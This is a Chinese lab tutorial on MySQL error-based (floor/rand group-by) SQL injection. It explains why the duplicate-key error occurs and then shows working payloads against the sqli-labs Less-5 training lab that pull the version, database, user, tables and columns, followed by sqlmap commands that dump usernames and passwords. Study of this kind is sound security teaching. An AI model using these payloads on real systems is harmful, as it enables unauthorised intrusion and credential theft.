报错注入形式上是两个嵌套的查询,即select…(select…),里面的那个select被称为子查询,它的执行顺序也是先执行子查询,然后再执行外面的select,双注入主要涉及到几个sql函数:
rand()随机函数,返回0~1之间的某个值。
floor(a)取整函数,向下取整。
count()聚合函数也称作计数函数,返回查询对象的总数。
group by clause分组语句,按照查询结果分组。
通过报错来显示出具体的信息。
查询时候如果使用 rand() 函数,值会计算多次(查询的时候计算一次,插入的时候计算一次)
floor(rand(0)*2)的值是定性的,假随机,为011011,同理还可用floor((14)*2)伪随机数列为1010。事实上上只要数够多,甚至可以不指定随机数种子,一定会触发错误。
floor(rand(0)*2)------011011
举个栗子
select count(*) from table group by floor(rand(0)*2);
group by 建立了一个虚表/临时表,每一行都有唯一的group_id,以floor(rand(0)2)为group_id,如果不存在则插入,如果存在则count()值加1.我们的数列为011011,解释如下:
- 创建好临时表后,Mysql开始逐行扫描table表,遇到的第一个分组列floor(rand(0)*2)为0,便查询临时表中是否有group——id为0的列,发现没有,则新增一行,但是注意此时rand()又计算了一次,所以插入的其实是1:
group_id - - - count(*)
1 - - - 1
- Mysql继续扫描table表,遇到第二个分组列floor(rand(0)*2)为1(第三个数1),发现1在临时表中,则不进行插入,rand()也就不会再次计算,count加1:
group_id - - - count(*)
1 - - - 2
- Mysql继续扫描,遇到第三个分组列floor(rand(0)*2)为0(第四个数0),发现0不在临时表中,则进行插入,此时rand()又计算了一次,floor(rand(0)*2)值为1,实际上插入的group_id是1,插入时id冲突,所以发生报错。
深层次的原因:
通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性,即可能为0也可能为1(group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中则更新临时表中的数据;如果该key不存在于临时表中,则在临时表中插入key所在行的数据。group by floor(random(0)*2)出错的原因是key是个随机数,检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0,如果此时临时表只有key为1的行不存在key为0的行,那么数据库要将该条记录插入临时表,由于是随机数,插时又要计算一下随机值,此时floor(random(0)*2)结果可能为1,就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。
实战演示 sqli-labs/less-5
构造payload爆库:
?id=0’ union select 1,2,3 from(select count(*),concat((select concat(version(),’-’,database(),’-’,user()) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
解释: 闭合符号’,回显位3个。
拆解一下payload
concat((select concat(version(),’-’,database(),’-’,user()) limit 0,1),floor(rand(0)*2))x
查找版本号,数据库名字,用户名字,并将它们和floor(rand(0)*2)拼接在一起,并命名为临时表x
select count(*),concat((select concat(version(),’-’,database(),’-’,user()) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x
运用之前说的count(*),floor(rand(0)*2)报错模式,只不过这里floor(rand(0)*2)前面加了一串字符串。简化一下select a,b from table group by b。
其中a为count(*),b为concat((select concat(version(),’-’,database(),’-’,user()) limit 0,1),floor(rand(0)*2)),table为information_schema.tables 。
select 1,2,3 from (select count(*),concat((select concat(version(),’-’,database(),’-’,user()) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a
select 1,2,3 from后面跟的也是一个临时表,所以需要起个名字a,否则会发生如下报错,每个派生都需要有自己的别名
Every derived table must have its own alias
爆表
?id=0’ union select 1,2,3 from(select count(*),concat((select concat(group_concat(table_name)) from information_schema.tables where table_schema=database() limit 0,1),’:’,floor(rand(0)*2))x from information_schema.tables group by x)a --+
爆列/字段名
?id=0’ union select 1,2,3 from(select count(*),concat((select concat(group_concat(column_name)) from information_schema.columns where table_name=‘users’ limit 0,1),’:’,floor(rand(0)*2))x from information_schema.tables group by x)a --+
Sqlmap测试
发现:
sqlmap -u “http://192.168.139.131/sqli/Less-5/?id=0”
发现有3个方式可以注入,基于时间:T,基于错误:E,基于bool:B。那就直接:
爆库
sqlmap -u “http://192.168.139.131/sqli/Less-5/?id=0” --technique TEB --current-db --batch
其中,–current-db发现当前数据所在数据库,(–dbs是发现所有数据库),–batch自动选择Y。可以得到数据库security。
爆表
sqlmap -u “http://192.168.139.131/sqli/Less-5/?id=0” --technique TEB --D security --tables --batch
爆列
sqlmap -u “http://192.168.139.131/sqli/Less-5/?id=0” --technique TEB --D security -T users --columns --batch
爆数据
sqlmap -u “http://192.168.139.131/sqli/Less-5/?id=0” --technique TEB --D security -T users -C ‘username,password’ --dump --batch
结束撒花~
685
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
